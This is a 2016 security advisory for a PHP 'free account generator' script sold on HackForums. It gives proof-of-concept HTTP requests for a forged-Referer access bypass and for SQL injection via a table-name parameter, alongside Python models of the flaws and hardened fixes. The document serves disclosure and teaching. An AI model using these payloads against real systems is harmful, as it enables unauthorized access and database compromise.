==============================================================================================
[-] Title => HackForums FAG 2.0 - Multiple Vulnerabilities
 
[-] Author => bRpsd (skype: vegnox)
 
[-] Date Release => 22 August, 2016
 
[-] Vendor => HackForums, froy0z
    Title => Free Account Generator 2.0
    Thread Post => http://hackforums.net/showthread.php?tid=4882268
    Download => https://mega.nz/#!SdMSGaZY!XYCeFoYlX0FdDazJ_Q2TpjWOUBh37jvX3kJWSX6UsUA
    Vulnerable Version => 2.0
    Tested Version => Latest, 2.0 on a Wamp Server
	==============================================================================================


	Vulnerability #1 : Using the generator without registering or purchasing a membership (bypass of the Referer-based access check).
	Vuln File: /lib/generate.php
	Vuln Code: Lines 3-6
	
/*********************************************************************************
3.	$pos = strpos($_SERVER['HTTP_REFERER'],getenv('HTTP_HOST'));
4.  if($pos===false){
5.    die('No Access');
6.  }
*********************************************************************************/

The only access control before an account is handed out is a strpos() check that the value of HTTP_HOST occurs
somewhere inside the Referer header. The Referer is chosen by the client, so anyone can pass the check by sending
a Referer that contains the host name; no registration or membership is ever consulted. Two further details of the
check are worth noting: when no Referer is sent, $_SERVER['HTTP_REFERER'] is undefined and strpos() runs on an empty
string, which is why the first request below is denied with "No Access"; and because strpos() is a substring match
rather than an origin comparison, a Referer such as http://localhost.attacker.example/ would also be accepted.
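The check above, re-implemented in Python as an added illustration for this write-up (not code from the FAG 2.0 package). It models PHP's strpos() and the undefined-index behaviour for a missing Referer, runs the PoC's two requests plus a look-alike host through the check, and contrasts it with the server-side session check the script should have used. The host name "localhost", the session keys and the attacker domain are assumptions.

```python
"""Model of the Referer check in /lib/generate.php (lines 3-6).

Added illustration for this write-up, not code from FAG 2.0: the PHP logic is
re-implemented so the different outcomes can be compared side by side.
Host name, session keys and the attacker domain are assumed.
"""
from typing import Mapping, Optional
from urllib.parse import urlsplit


def php_strpos(haystack: str, needle: str) -> Optional[int]:
    """PHP strpos(): offset of the first occurrence, or false (None here) if absent."""
    idx = haystack.find(needle)
    return None if idx < 0 else idx


def vulnerable_check(headers: Mapping[str, str], http_host: str) -> bool:
    """Mirror of lines 3-6: allow iff HTTP_HOST is a substring of the Referer.

    A missing Referer leaves $_SERVER['HTTP_REFERER'] undefined; PHP treats it
    as '' (with a notice/warning), strpos() returns false, and access is denied.
    """
    referer = headers.get("Referer", "")
    return php_strpos(referer, http_host) is not None


def same_origin_referer(headers: Mapping[str, str], http_host: str) -> bool:
    """Stricter comparison: the Referer's host[:port] must equal HTTP_HOST.

    This closes the substring hole (localhost.attacker.example) but is still
    not access control, because the client picks the header value.
    """
    referer = headers.get("Referer")
    if not referer:
        return False
    return urlsplit(referer).netloc.lower() == http_host.lower()


def authorized(session: Mapping[str, object]) -> bool:
    """What the script should check: server-side session state set at login or
    purchase, which cannot be forged by editing request headers. Session keys
    are assumed for the example."""
    return bool(session.get("user_id")) and bool(session.get("membership_active"))


def run_cases() -> dict:
    """Constructed requests: the PoC request without Referer, the bypass,
    a look-alike host, and two session states."""
    host = "localhost"
    no_referer = {"Host": host, "User-Agent": "Mozilla/5.0"}
    forged = dict(no_referer, Referer="http://localhost/lib/generate.php?generator=1")
    lookalike = dict(no_referer, Referer="http://localhost.attacker.example/")
    return {
        "no_referer": vulnerable_check(no_referer, host),          # denied: "No Access"
        "forged_referer": vulnerable_check(forged, host),          # allowed: account handed out
        "lookalike_host": vulnerable_check(lookalike, host),       # allowed: substring match
        "lookalike_strict": same_origin_referer(lookalike, host),  # denied by exact compare
        "anonymous_session": authorized({}),                       # denied
        "member_session": authorized({"user_id": 7, "membership_active": True}),  # allowed
    }


if __name__ == "__main__":
    for name, allowed in run_cases().items():
        print(f"{name:18} -> {'allowed' if allowed else 'denied'}")
```

The practical lesson is that no variant of a Referer comparison is an authorization check; the generator must be gated on the same server-side login/membership state the rest of the site uses.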


[-] Proof Of Concept [-]



http://localhost/lib/generate.php?generator=1

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
If-None-Match: 1
Upgrade-Insecure-Requests: 1


Response:
No Access






[bypass]

http://localhost/lib/generate.php?generator=1

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lib/generate.php?generator=1
Connection: keep-alive
If-None-Match: 1
Upgrade-Insecure-Requests: 1


Response:
[email protected]:123123






--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
	Vulnerability #2 : SQL Injection (table name built from the 'generator' parameter)
	Vuln File: /lib/generate.php
	Vuln Code: Lines 10 & 34-40
	
/******************************************************************************************************************************************************************
10. $generator = mysqli_real_escape_string($con, $_GET['generator']);

34. $result = mysqli_query($con, "SELECT * FROM `generator$generator` WHERE `status` != '0' ORDER BY RAND() LIMIT 1") or die(mysqli_error($con));
35. if(mysqli_num_rows($result) < 1){
36. 	exit("0 Accounts in stock");
37. }
38. while($row = mysqli_fetch_array($result)){
39. 	echo $row['alt'];
40. }
******************************************************************************************************************************************************************/


The 'generator' parameter is passed through mysqli_real_escape_string() on line 10 and then concatenated into the
table name of the query on line 34. Escaping only neutralises the characters that matter inside a quoted string
literal (quotes, backslashes, NUL and line breaks); it does not touch backticks or spaces, and the value is used
here as an identifier rather than a string literal, so the escaping gives no protection at all. An attacker can
break out of the backtick-quoted table name and change the statement sent to the DBMS. Two details make this worse:
the query is followed by or die(mysqli_error($con)), so the server's raw error text (including the database name,
as the first response below shows) is returned to the client, and the matched row's 'alt' column is echoed on
line 39, so query results are reflected back to the attacker.
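The following Python model, added for this write-up and not part of the FAG 2.0 package, reproduces the character set that mysqli_real_escape_string() rewrites, builds the exact statement the two PoC URLs below produce (decoding '+' to a space the way $_GET does), and shows a hardened replacement that never lets client input reach identifier position. The allow-list of table names is an assumption standing in for whatever tables the real database contains.

```python
"""Model of lines 10 and 34 of /lib/generate.php: escaping does not protect a table name.

Added illustration for this write-up, not code from FAG 2.0. The escape function
reproduces the rewrite set of mysqli_real_escape_string(); the table allow-list
is an assumption.
"""
import re
from urllib.parse import unquote_plus

# Characters rewritten by mysqli_real_escape_string(): NUL, \n, \r, backslash,
# single quote, double quote and Ctrl-Z. Backticks and spaces are NOT in this set.
_ESCAPES = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
            "'": "\\'", '"': '\\"', "\x1a": "\\Z"}


def mysqli_real_escape_string(value: str) -> str:
    """Same rewrite as the PHP function: adequate inside a quoted string literal,
    meaningless for an identifier."""
    return "".join(_ESCAPES.get(c, c) for c in value)


def vulnerable_query(generator_param: str) -> str:
    """Line 34 as written: the escaped value is spliced into a backtick-quoted identifier."""
    generator = mysqli_real_escape_string(generator_param)
    return (f"SELECT * FROM `generator{generator}` WHERE `status` != '0' "
            "ORDER BY RAND() LIMIT 1")


def query_for_url_param(raw: str) -> str:
    """Decode the value as PHP populates $_GET ('+' becomes a space) and build
    the statement the PoC URL produces."""
    return vulnerable_query(unquote_plus(raw))


# Assumed mapping from the public generator number to the real table name.
GENERATOR_TABLES = {1: "generator1", 2: "generator2", 3: "generator3"}


def safe_query(generator_param: str) -> str:
    """Hardened version: MySQL cannot bind an identifier as a prepared-statement
    parameter, so the client value is only ever used as a key into a server-side
    allow-list and the table name itself comes from code, not from the request."""
    if not re.fullmatch(r"[0-9]{1,3}", generator_param):
        raise ValueError("generator must be a small integer")
    key = int(generator_param)
    if key not in GENERATOR_TABLES:
        raise ValueError("unknown generator")
    table = GENERATOR_TABLES[key]
    return f"SELECT * FROM `{table}` WHERE `status` != '0' ORDER BY RAND() LIMIT 1"


def is_rejected(generator_param: str) -> bool:
    """True if the hardened builder refuses the value."""
    try:
        safe_query(generator_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for raw in ("1", "1+3", "1`+TEST", "1'"):
        print(f"{raw!r:12} vulnerable -> {query_for_url_param(raw)}")
        print(f"{'':12} hardened   -> "
              f"{'rejected' if is_rejected(unquote_plus(raw)) else safe_query(raw)}")
```

In the PHP source the minimal equivalent fix is a cast, `$generator = (int)$_GET['generator'];`, or better a lookup through an allow-list of table names as above; prepared statements on their own do not help because the injection point is an identifier, not a value. Independently of the injection, `or die(mysqli_error($con))` should give way to generic error handling so database names and query fragments are not returned to the client.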







[-] Proof Of Concept [-]


http://localhost/lib/generate.php?generator=1+3
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lib/generate.php?generator=1+3
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-None-Match: 1



Response:
Table 'FAG_2sql1.generator1 3' doesn't exist




http://localhost/lib/generate.php?generator=1`+TEST
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lib/generate.php?generator=1`+TEST
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-None-Match: 1

Response:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '` WHERE `status` != '0' ORDER BY RAND() LIMIT 1' at line 1

# siph0n [2016-08-22]